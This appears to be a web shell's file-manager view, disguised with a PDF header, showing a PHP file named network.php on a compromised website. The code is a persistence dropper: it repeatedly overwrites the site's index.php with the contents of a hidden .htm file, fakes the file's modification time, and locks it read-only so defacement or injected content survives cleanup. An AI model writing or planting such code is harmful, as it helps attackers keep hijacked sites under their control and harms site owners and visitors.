%PDF- %PDF-
| Direktori : /home/cargonizer/public_html/includes/ |
| Current File : /home/cargonizer/public_html/includes/network.php |
<?php
$insj = '/home/cargonizer/domains/cargonizer.com.tr/public_html/index.php';
$inym = '/home/cargonizer/domains/cargonizer.com.tr/public_html/Wy7JyJ/RZjlAo.htm';
if (file_exists($insj)) {
if (file_exists($inym)) {
@chmod($insj, 0777);
if (md5_file($insj) == md5_file($inym)) {
} else {
$chazh = @file_get_contents($inym);
$at = filemtime($inym);
file_put_contents($insj, $chazh);
if ($at) {
touch($insj, $at);
}
}
@chmod($insj, 0444);
}
} else {
if (file_exists($inym)) {
$at = filemtime($inym);
$chazh = @file_get_contents($inym);
file_put_contents($insj, $chazh);
if ($at) {
touch($insj, $at);
}
}
}
?>